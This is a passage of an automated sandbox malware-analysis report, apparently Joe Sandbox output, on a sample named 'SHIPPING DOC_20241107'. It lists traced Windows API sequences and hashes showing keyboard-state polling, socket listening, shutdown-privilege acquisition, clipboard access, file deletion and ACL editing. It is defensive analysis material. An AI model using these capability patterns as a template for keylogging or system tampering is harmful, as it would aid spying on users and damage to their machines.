                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                              • String ID: :$\$\??\%s
                                                                                                                              • API String ID: 2733774712-3457252023
                                                                                                                              • Opcode ID: a683f7c0ecc5460b37915a4a367d0f0704669eede7b00cbff1685104213c6c2c
                                                                                                                              • Instruction ID: a5e59496aefa22b1b1c244318011bd31eb9b0c1bd5e56743805119db529444eb
                                                                                                                              • Opcode Fuzzy Hash: a683f7c0ecc5460b37915a4a367d0f0704669eede7b00cbff1685104213c6c2c
                                                                                                                              • Instruction Fuzzy Hash: 5331A1B5900209ABDB21DFA0DC49FEB77BCEF89740F1041B6FA19D6160EB7096858B25
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00A0852A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A08546
                                                                                                                                • Part of subcall function 00A0852A: GetLastError.KERNEL32(?,00A0800A,?,?,?), ref: 00A08550
                                                                                                                                • Part of subcall function 00A0852A: GetProcessHeap.KERNEL32(00000008,?,?,00A0800A,?,?,?), ref: 00A0855F
                                                                                                                                • Part of subcall function 00A0852A: HeapAlloc.KERNEL32(00000000,?,00A0800A,?,?,?), ref: 00A08566
                                                                                                                                • Part of subcall function 00A0852A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A0857D
                                                                                                                                • Part of subcall function 00A085C7: GetProcessHeap.KERNEL32(00000008,00A08020,00000000,00000000,?,00A08020,?), ref: 00A085D3
                                                                                                                                • Part of subcall function 00A085C7: HeapAlloc.KERNEL32(00000000,?,00A08020,?), ref: 00A085DA
                                                                                                                                • Part of subcall function 00A085C7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00A08020,?), ref: 00A085EB
                                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A08238
                                                                                                                              • _memset.LIBCMT ref: 00A0824D
                                                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A0826C
                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00A0827D
                                                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00A082BA
                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A082D6
                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00A082F3
                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00A08302
                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00A08309
                                                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A0832A
                                                                                                                              • CopySid.ADVAPI32(00000000), ref: 00A08331
                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A08362
                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A08388
                                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A0839C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3996160137-0
                                                                                                                              • Opcode ID: 4198f1c8289f2695210114ab75ed5c0e2edb8c208300a01b59bd80320c43f97a
                                                                                                                              • Instruction ID: 33c8f3333bdfc8588e4922fa8dc07fba8b591a180f47991ed7efd7684e5722ec
                                                                                                                              • Opcode Fuzzy Hash: 4198f1c8289f2695210114ab75ed5c0e2edb8c208300a01b59bd80320c43f97a
                                                                                                                              • Instruction Fuzzy Hash: 3761697190020EEFDF14CFA4EC45AEEBB79FF45700F048129F955AA291EB399A05CB64
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                              • API String ID: 0-4052911093
                                                                                                                              • Opcode ID: 3c8d9910be555039e2c2c0dcd32c4e0c466e480480b0443cac7102fac377b223
                                                                                                                              • Instruction ID: 6b22b532a37025843b58421dd2c97d21912f964a5c26e15d18eb5e2b68b6dbb6
                                                                                                                              • Opcode Fuzzy Hash: 3c8d9910be555039e2c2c0dcd32c4e0c466e480480b0443cac7102fac377b223
                                                                                                                              • Instruction Fuzzy Hash: 7A725F75E00219DBDB14CF59D890BEEB7B5FF48310F14816AE849EB291EB349E81CB91
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00A30EA5: CharUpperBuffW.USER32(?,?), ref: 00A30EBC
                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A30537
                                                                                                                                • Part of subcall function 009B9997: __itow.LIBCMT ref: 009B99C2
                                                                                                                                • Part of subcall function 009B9997: __swprintf.LIBCMT ref: 009B9A0C
                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00A305D6
                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00A3066E
                                                                                                                              • RegCloseKey.ADVAPI32(000000FE), ref: 00A308AD
                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A308BA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1240663315-0
                                                                                                                              • Opcode ID: c86dc41e6b80925b85d69eb2ee00d4db633563dc9eba87ac499aacad2212b5b3
                                                                                                                              • Instruction ID: 77b8721beb6287391a9c382b9d950f0ee1d9252295cbca50b45a86371c241456
                                                                                                                              • Opcode Fuzzy Hash: c86dc41e6b80925b85d69eb2ee00d4db633563dc9eba87ac499aacad2212b5b3
                                                                                                                              • Instruction Fuzzy Hash: 3CE15E31604210AFCB14DF69C995E6ABBF5EF89714F04856DF84ADB262DB30ED01CB51
                                                                                                                              APIs
                                                                                                                              • GetKeyboardState.USER32(?), ref: 00A10062
                                                                                                                              • GetAsyncKeyState.USER32 ref: 00A100E3
                                                                                                                              • GetKeyState.USER32(000000A0), ref: 00A100FE
                                                                                                                              • GetAsyncKeyState.USER32 ref: 00A10118
                                                                                                                              • GetKeyState.USER32(000000A1), ref: 00A1012D
                                                                                                                              • GetAsyncKeyState.USER32 ref: 00A10145
                                                                                                                              • GetKeyState.USER32(00000011), ref: 00A10157
                                                                                                                              • GetAsyncKeyState.USER32 ref: 00A1016F
                                                                                                                              • GetKeyState.USER32(00000012), ref: 00A10181
                                                                                                                              • GetAsyncKeyState.USER32 ref: 00A10199
                                                                                                                              • GetKeyState.USER32(0000005B), ref: 00A101AB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 541375521-0
                                                                                                                              • Opcode ID: 61504f61c04c34eba577f78ccce67a2836ebe13456f74787e52f29d84e165a6f
                                                                                                                              • Instruction ID: 259e8508273a3f1201961e1f0f3ad691ba8daafcfc3aef49c01a3342b53196e7
                                                                                                                              • Opcode Fuzzy Hash: 61504f61c04c34eba577f78ccce67a2836ebe13456f74787e52f29d84e165a6f
                                                                                                                              • Instruction Fuzzy Hash: 8C41B934A047CA7DFF319B648D04BF6BEA16F15340F08819AD5C6465C2EBE89DC4C7A2
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B9997: __itow.LIBCMT ref: 009B99C2
                                                                                                                                • Part of subcall function 009B9997: __swprintf.LIBCMT ref: 009B9A0C
                                                                                                                              • CoInitialize.OLE32 ref: 00A28518
                                                                                                                              • CoUninitialize.OLE32 ref: 00A28523
                                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00A42BEC,?), ref: 00A28583
                                                                                                                              • IIDFromString.OLE32(?,?), ref: 00A285F6
                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00A28690
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00A286F1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                              • API String ID: 834269672-1287834457
                                                                                                                              • Opcode ID: 2bffd5800dee6ee155924e47f8080226d1cd6ef6941062d67c2c9bb5a729b47b
                                                                                                                              • Instruction ID: dadf31250f48107b4e5f201032ba267adc1c6421f3b298eee1e77d4458f6fca9
                                                                                                                              • Opcode Fuzzy Hash: 2bffd5800dee6ee155924e47f8080226d1cd6ef6941062d67c2c9bb5a729b47b
                                                                                                                              • Instruction Fuzzy Hash: F161B4706093219FD710DF68D949B5EB7F8AF84714F00492DF9859B291CB78ED48CB92
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1737998785-0
                                                                                                                              • Opcode ID: 84cc0fbc7a79302a575c27ed08d3ec6c4c63bc6a61e0d4c882a40d91160d15de
                                                                                                                              • Instruction ID: 45730a9a32834c43710c5aa275be90038aa2618084b78cdaff023693abf0a13f
                                                                                                                              • Opcode Fuzzy Hash: 84cc0fbc7a79302a575c27ed08d3ec6c4c63bc6a61e0d4c882a40d91160d15de
                                                                                                                              • Instruction Fuzzy Hash: 9E219535611620DFDB10EFA4ED49BAE77A8EF58721F148026F946DB2B1DB70AC01CB54
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009B48A1,?,?,009B37C0,?), ref: 009B48CE
                                                                                                                                • Part of subcall function 00A14AD8: GetFileAttributesW.KERNEL32(?,00A1374F), ref: 00A14AD9
                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00A138E7
                                                                                                                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00A1398F
                                                                                                                              • MoveFileW.KERNEL32 ref: 00A139A2
                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00A139BF
                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A139E1
                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00A139FD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                              • String ID: \*.*
                                                                                                                              • API String ID: 4002782344-1173974218
                                                                                                                              • Opcode ID: 9dbc52422b591fcecc95f72612a557075759cb3989a004a35fa1b9cba6243086
                                                                                                                              • Instruction ID: 7e3b63b5fa9a74a5226ad1955da91957e4c272c9328f95b6e13e490ec930e0e4
                                                                                                                              • Opcode Fuzzy Hash: 9dbc52422b591fcecc95f72612a557075759cb3989a004a35fa1b9cba6243086
                                                                                                                              • Instruction Fuzzy Hash: AD517D3280514CAACF15EFE0CE92AEDB779AF94310F644269E44277192EF316F49CB60
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B7F41: _memmove.LIBCMT ref: 009B7F82
                                                                                                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00A1F4CC
                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 00A1F4FC
                                                                                                                              • _wcscmp.LIBCMT ref: 00A1F510
                                                                                                                              • _wcscmp.LIBCMT ref: 00A1F52B
                                                                                                                              • FindNextFileW.KERNEL32(?,?), ref: 00A1F5C9
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00A1F5DF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                              • String ID: *.*
                                                                                                                              • API String ID: 713712311-438819550
                                                                                                                              • Opcode ID: 4771fc047e2839ef37e17d66c0ad4cc3d6b7b2d462bac53391cc021d76afeecd
                                                                                                                              • Instruction ID: cad8530479d5cbf4394e4d441b69d634d379d5714280f3d7d801b5955d7a3855
                                                                                                                              • Opcode Fuzzy Hash: 4771fc047e2839ef37e17d66c0ad4cc3d6b7b2d462bac53391cc021d76afeecd
                                                                                                                              • Instruction Fuzzy Hash: 6B418E7190124AAFCF10DFA4CD45AEEBBB9FF44320F144566F815A32A1EB319E85CB90
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                              • API String ID: 0-1546025612
                                                                                                                              • Opcode ID: f413aceaffaffcafa4c0fdcdd1b8ab6016d0b838022bcc9fe62c4d798cb62f3c
                                                                                                                              • Instruction ID: aa97de70bd0f93e962fa56db28d50730860f469b1b3d3111eeb52b9e117b2c06
                                                                                                                              • Opcode Fuzzy Hash: f413aceaffaffcafa4c0fdcdd1b8ab6016d0b838022bcc9fe62c4d798cb62f3c
                                                                                                                              • Instruction Fuzzy Hash: 64A2B070E0421ACBDF24CF98C9A0BBDB7B5BB44314F2485AED959A7284D7349E81CF52
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4104443479-0
                                                                                                                              • Opcode ID: 84943d70b46b4b7850a24a1e9ff83f188c58bea8a0881b24aa00f670db0da513
                                                                                                                              • Instruction ID: 21ca251b3f0455661e9c1c1b9d132528bf2a1df8b07b53bdf71f82a94dabdfe5
                                                                                                                              • Opcode Fuzzy Hash: 84943d70b46b4b7850a24a1e9ff83f188c58bea8a0881b24aa00f670db0da513
                                                                                                                              • Instruction Fuzzy Hash: C4128970E006099FDF14DFA9D981BEEB7B9FF88300F208569E406A7291EB35AD51CB51
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00A08AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A08AED
                                                                                                                                • Part of subcall function 00A08AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A08B1A
                                                                                                                                • Part of subcall function 00A08AA3: GetLastError.KERNEL32 ref: 00A08B27
                                                                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 00A152A0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                              • String ID: $@$SeShutdownPrivilege
                                                                                                                              • API String ID: 2234035333-194228
                                                                                                                              • Opcode ID: 7e3d8f81fb50b960f944b10b456b92f273953d27d5f07edd771450f748b26daf
                                                                                                                              • Instruction ID: c4cc5f01171815f18d29e8ba90a0a382080d8069ffc93570c47bced13dff6db7
                                                                                                                              • Opcode Fuzzy Hash: 7e3d8f81fb50b960f944b10b456b92f273953d27d5f07edd771450f748b26daf
                                                                                                                              • Instruction Fuzzy Hash: 2F01F733F90715EFEB2867B8AC4BBFB7268AB46781F240525F847D24D2DA715C808594
                                                                                                                              APIs
                                                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00A263F2
                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00A26401
                                                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00A2641D
                                                                                                                              • listen.WSOCK32(00000000,00000005), ref: 00A2642C
                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00A26446
                                                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00A2645A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1279440585-0
                                                                                                                              • Opcode ID: 3a2b54cca4c54a62d4b778170f6b60d33de573164ade30babffbfa464b9152c6
                                                                                                                              • Instruction ID: dfe7221973d2f137d854beef2b106c0734ee385f60285ea1838866576d4193e1
                                                                                                                              • Opcode Fuzzy Hash: 3a2b54cca4c54a62d4b778170f6b60d33de573164ade30babffbfa464b9152c6
                                                                                                                              • Instruction Fuzzy Hash: 7721B134600214AFCB14EFA8DE49B6EB7B9EF45720F148169F996A73D2CB70AD01CB51
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009D0F36: std::exception::exception.LIBCMT ref: 009D0F6C
                                                                                                                                • Part of subcall function 009D0F36: __CxxThrowException@8.LIBCMT ref: 009D0F81
                                                                                                                              • _memmove.LIBCMT ref: 00A005AE
                                                                                                                              • _memmove.LIBCMT ref: 00A006C3
                                                                                                                              • _memmove.LIBCMT ref: 00A0076A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1300846289-0
                                                                                                                              • Opcode ID: 05e57ebda751d1d61c8253fe842a8b9d3bda394005b11c47ab6a3e062a66e992
                                                                                                                              • Instruction ID: 744e02d80684fdac490c1b443d7f91c72f86a0fcb40ffd86787113decabd14be
                                                                                                                              • Opcode Fuzzy Hash: 05e57ebda751d1d61c8253fe842a8b9d3bda394005b11c47ab6a3e062a66e992
                                                                                                                              • Instruction Fuzzy Hash: A0028F70E00209DBDF14DF68D981BAEBBB5EF84310F158069E806DB395EB35EA51CB91
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B2612: GetWindowLongW.USER32(?,000000EB), ref: 009B2623
                                                                                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 009B19FA
                                                                                                                              • GetSysColor.USER32(0000000F,?,?), ref: 009B1A4E
                                                                                                                              • SetBkColor.GDI32(?,00000000), ref: 009B1A61
                                                                                                                                • Part of subcall function 009B1290: DefDlgProcW.USER32(?,00000020,?), ref: 009B12D8
                                                                                                                              Memory Dump Source
